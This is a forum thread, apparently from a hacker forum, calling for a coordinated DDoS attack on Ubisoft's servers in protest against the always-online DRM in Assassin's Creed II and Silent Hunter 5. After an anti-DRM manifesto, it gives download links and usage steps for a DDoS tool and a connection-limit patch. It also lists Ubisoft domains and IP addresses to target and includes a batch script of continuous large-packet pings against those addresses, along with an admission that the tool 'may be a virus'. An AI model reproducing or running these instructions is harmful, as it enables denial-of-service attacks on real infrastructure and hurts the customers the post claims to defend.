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  1. Welcome to the Official English DDOS Thread
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  3. First and foremost, we apologize for inconvenience to the players who bought the game and now cannot play. Please understand that we would prefer not to impact you negatively if we had the choice. In fact, many of us have a licensed version and also cannot play the game during DDOS. However, Ubisoft designed the DRM in a way that holds their customers hostage. Reasons for that will be explained further. The simple truth is that if we don’t stop this DRM system now, it will become accepted for most PC games by ALL major publishers. For the sake of the future of PC gaming and consumer rights PLEASE TAKE A STAND WITH US.
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  6. How Ubisoft DRM works
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  8. Surely most of the people reading this are familiar with how it works. If you are, skip ahead...
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  10. The Ubisoft DRM is the most restrictive DRM ever implemented in a PC game. Currently, 2 games have it: Assassin’s Creed II and Silent Hunter 5. They are both SINGLE PLAYER games and Assassin’s Creed doesn’t even have a multiplayer component. Nevertheless, both REQUIRE CONSTANT INTERNET CONNECTION. If your connection to the Ubisoft server is interrupted, the game pauses until such time as the connection is resumed (note that the first version of the game quit into main menu). If it is not resumed promptly, you will not able to save your progress. Ubisoft requires you to be online to save the game and saved games are stored on their servers. Although they allowed to store saves offline recently, they are still synced with online saves. If DRM fails during the sync, the save is lost. This caused many gamers to lose 10-20 hours of progress, when Ubisoft wiped their saves during the sync process (see: http://forums.ubi.com/eve/forums/a/t...6/m/1641051148). With Ubisoft DRM, you are no longer BUYING the game; - you are RENTING it at full price. Your ability to play a SINGLE PLAYER game is completely dependent on Ubisoft servers (and how protected they are )
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  13. What are we trying to achieve
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  15. We are trying to get Ubisoft to remove their DRM or at the very least to implement an offline mode. In the bigger scheme of things, we are trying to prevent this form of DRM from taking over the PC gaming market.
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  18. Why Ubisoft has done this
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  20. People who think that this is about preventing piracy of a specific game are missing the BIGGER PICTURE. Ubisoft is testing a new platform for game delivery (think: Steam). This is NOT about piracy, as much as it is about maximizing revenue. If your game is tied to your online account, you are no longer in possession of the game. The game cannot be resold. It cannot be given as a gift. You cannot buy a game from a different platform (think: Half-Life 2). You cannot lend it to a friend. If you can only play the game while online, Ubisoft is in complete control of how and when you use the game you bought. In the future, it enables them to implement whatever pricing structures they feel like. They can even charge you per save if they want to.
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  23. What Ubisoft could have done differently
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  25. If Ubisoft had more concern about you – their customers, they would have implemented fall-back mechanisms. For example, forcing online saving and pausing the game when the connection is lost was unnecessary. IT DOES NOT MAKE THE GAME EASIER TO CRACK. Instead, the game could easily pause at the next checkpoint. However, it was not their objective to create a worthwhile gaming experience. Their objective was to BETA-TEST THE MOST RESTRICTIVE FORM OF DRM POSSIBLE to see how easily users will adopt it. Unfortunately, without this protest, they will be successful.
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  28. If Ubisoft wins, you can expect this form of DRM to become standard in the PC gaming industry.
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  30. Even developers who do not want to put it into their games will be required to by investors. For the future of PC gaming and consumer rights, WE CANNOT LET IT HAPPEN.
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  32. What you can do:
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  34. • JOIN US: You can find the instructions in this thread.
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  36. • VOTE WITH YOUR WALLET: Do not buy any Ubisoft games until they remove this protection (full list here: http://en.wikipedia.org/wiki/List_of_Ubisoft_games)
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  38. • SPREAD THE WORD: Tell your friends about this, blog, twitter, post to facebook, put it in your signature, you know the rest…
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  40. • SIGN PETITION: It is not the most effective means, but signing it couldn't hurt: http://www.petitiononline.com/mod_pe...cgi?ew15dl94&1
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  42. • TELL UBISOFT: Let Ubisoft know your position on this DRM. http://www.ubisoftgroup.com/index.php?p=62 Select you region on the map.
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  44. Well, washing your talk here, only without the insults.
  45. Our users can respond to you via a translator, do not judge strictly.
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  47. We started ddos protest, and we will continue!
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  49. Who wants to communicate with us on line, come to our IRC channel:
  50. irc://irc.securitychat.org
  51. Channel: #webxakep
  52. Who does not know how to run the irc, click here.
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  56. Does not swing not what other software! May be a virus!
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  58. The attack started! We attack all together until the end!
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  61. For all who have Windows than 7, by default you have a limit of 10 threads, for a successful attack, you need to remove this limitation! Download the program http://www.half-open.com/Half-open_limit_fix_4.1.exe and put a new meaning in 2000
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  63. Instructions:
  64. 1) Run the Half-open limit fix
  65. 2) Select the new limit on the number of concurrent half-open outbound connections and press the "Add to tcpip.sys» (for the vast majority of users will be sufficient a limit equal to 2000)
  66. 3) Restart your computer and enjoy
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  68. All swing ddos program:
  69. BlackOut v1.0
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  72.  
  73. Any link:
  74. http://sendfile.su/21319
  75. http://depositfiles.com/files/3z1e2245a
  76. http://www.getthebit.com/f/erq/addaa..._v1.0.zip.html
  77. http://openfile.ru/476869/
  78. http://rapidshare.com/files/32300378..._v1.0.zip.html
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  82. Explanation:
  83. Where is number 1: there select HTTP
  84. Where is number 2: Enter the address from the list below (see below, enter only the domain)
  85. Where is number 3: Number of bots to attack, I think 50 will suffice
  86. Where the number 4: Click to launch attacks
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  88. Attack these sites: (enter without http)
  89. static3.cdn.ubi.com
  90. static2.cdn.ubi.com
  91. secure.ubi.com
  92. onlineconfigservice.ubi.com
  93. ubi.com
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  95. Run ping (http://webxakep.net/anti_drm.rar):
  96. @echo off
  97. @echo Dos Attack Time! Start 15:00 "Moscow Time"
  98. @echo If We Dos Ubisoft System Servers From All Around The World,Their Servers Will Go Down Because Of Overload!
  99. @echo WebXakep.net DRM OFF, To Start Click Anything!
  100. pause
  101. start ping 87.248.207.160 -t -l 1024
  102. start ping 87.248.207.148 -t -l 1024
  103. start ping 216.98.48.18 -t -l 1024
  104. start ping 63.251.9.27 -t -l 1024
  105. start ping 216.98.48.5 -t -l 1024
  106. start ping 216.98.48.35 -t -l 1024
  107. start ping 216.98.51.199 -t -l 1024
  108. start ping 216.98.51.202 -t -l 1024
  109. start ping 216.98.51.204 -t -l 1024
  110. start ping 216.98.51.205 -t -l 1024
  111. start ping 87.248.216.34 -t -l 1024
  112. start ping 87.248.217.229 -t -l 1024
  113. start ping 87.248.218.117 -t -l 1024
  114. start ping 87.248.219.138 -t -l 1024
  115. or a better download the file and run:
  116. http://webxakep.net/anti_drm.rar
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  118. The attack started! We attack all together until the end!
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  120. Inviting all the people that we can.
  121.  
  122. [________W3bX4k3p F0rum________]
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